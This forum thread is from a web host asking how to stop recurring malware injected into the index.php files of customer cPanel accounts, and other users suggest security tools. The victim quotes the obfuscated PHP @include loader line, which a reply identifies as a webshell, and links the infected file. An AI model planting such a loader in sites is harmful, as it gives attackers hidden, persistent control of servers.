cPanel account virus penetration - whmcs? wordpress? How to manage customer accounts

[shine lee]

cPanel account virus penetration - whmcs? wordpress? How to manage customer accounts

I recently deleted all individual accounts inside cPanel.
I created an account again.

A random code was created in the index.php file for each account. A folder name was created by random number

for the expected cause ..

1. Penetration through WordPress files
2. Infiltration of cPanel account through hacking of external customer account (cPanel) ID and password through whmcs

I use whmcs.com for a monthly fee.
We provided individual accounts for cPanel services on a WordPress basis.

The site was paralyzed by a virus intrusion. I have deleted that site.

How to manage hosted services to external customers?
Ask for advice.
Thank you.

 

[cPRex]

I recently deleted all individual accounts inside cPanel.

Hey there! Did you mean you deleted all accounts through WHM, and then files were placed in the public_html of the newly-created accounts?

If you access the server over SSH and check the "last" command, do you see any root accesses to the server that you aren't familiar with?

 

[ankeshanand]

As Per I know, WHMCS is the leading software in terms of provisioning and automating the Customer Processes with cPanel. You can also Try Hosting Billing, BillingFox or Hostbill. These are some of the top alternatives to cPanel.

There should be no Virus Intrusion or Antivirus by Default in cPanel/WHM. You have to install External Antivirus like ClamAV or Imunify360. And What do you mean by Virus Intrusion? Could You provide WebServer Error Logs or Some Screenshots which shows the Intrusion or Describe the Situation.

If any random code was created on All cPanel Account which is totally unidentified, Maybe its due to Root Password has been Hacked because Small Injections and Attacks on Individual Websites does not lead to Whole Server being compromised. Alternatively, Check if WHMCS Installation has been hacked. There are some instances of WHMCS Installation having Vulnerablities which lead to Root Compromise.
If Your Server Root is Compromised, You should just secure the User Data and Make a New cPanel Installation.

 

[shine lee]

PHP /*a8959*/ @include "\057hom\145/ho\164ite\155int\166ite\155/pu\142lic\137htm\154/ho\164ite\155.co\057cat\141log\057mod\145l/c \157ut/\056b62\061a2b\071.ic\157"; /*a8959*/
It floods the index.php file. Write the code above that parent.

And it creates random files and folders for each folder.

After deleting these accounts, we started operation.
A month later, it came back.

I have now restored my account after deleting it again.

The risk is - Access through user account - After stealing password, etc.

whmcs says it's impossible.

Each cPanel account uses a password as a recommended form.

Where and how to stop such wormware and virus forms?

Do not open the source on the Linux server.

I deleted the accounts again today and reinstalled them.

Can a recommended antivirus program block it?

I need your help.

thank you.

 

[sahostking]

Why not ask for a trial from Bitninja or Imunify360 and run it on your server to see if it helps and cleans out any issues.

Dont forget if you hosting for customers and want peace of mind that your whole server will be better protected using Cloudlinux with CageFS is almost a must in todays time. So if one accountn or site gets hacked it does not affect the whole server or other accounts.

 

[ankeshanand]

PHP /*a8959*/ @include "\057hom\145/ho\164ite\155int\166ite\155/pu\142lic\137htm\154/ho\164ite\155.co\057cat\141log\057mod\145l/c \157ut/\056b62\061a2b\071.ic\157"; /*a8959*/
It floods the index.php file. Write the code above that parent.

And it creates random files and folders for each folder.

After deleting these accounts, we started operation.
A month later, it came back.

I have now restored my account after deleting it again.

The risk is - Access through user account - After stealing password, etc.

Portal Home - hotitem inc

whmcs says it's impossible.

Each cPanel account uses a password as a recommended form.

Where and how to stop such wormware and virus forms?

Do not open the source on the Linux server.

https://intvitem.kr/index.php.zip

I deleted the accounts again today and reinstalled them.

Can a recommended antivirus program block it?

I need your help.

thank you.

Thanks for sharing the file, I'll test it and report you back about whats inside it(On a Linux Virtualized Server). BTW, If you still have problems regarding this Virus/Malware/Whatever, You should prefer making a New Server, Install Imunify360 and create a Migration.

And for Passwords, I would like to clarify that WHMCS passwords can be hacked though they say it cannot be but I've done that on WHMCS 7.10.3 and 8.0.1.

 

[ankeshanand]

The file you shared on index.php.zip has a WebShell(Added through Include). So the hacker can access your account as the User and do whatever he wants to do on the Server. First, Use some Antivirus to clean up your mess and Move on to a New server after that.

 

[shine lee]

The file you shared on index.php.zip has a WebShell(Added through Include). So the hacker can access your account as the User and do whatever he wants to do on the Server. First, Use some Antivirus to clean up your mess and Move on to a New server after that.

The information you provided was helpful.
thank you so much.

 

[shine lee]

Why not ask for a trial from Bitninja or Imunify360 and run it on your server to see if it helps and cleans out any issues.

Dont forget if you hosting for customers and want peace of mind that your whole server will be better protected using Cloudlinux with CageFS is almost a must in todays time. So if one accountn or site gets hacked it does not affect the whole server or other accounts.

We are reviewing the Bitninja or Imunify360 you mentioned.

I really wish I could catch only those that invade me.

thank you.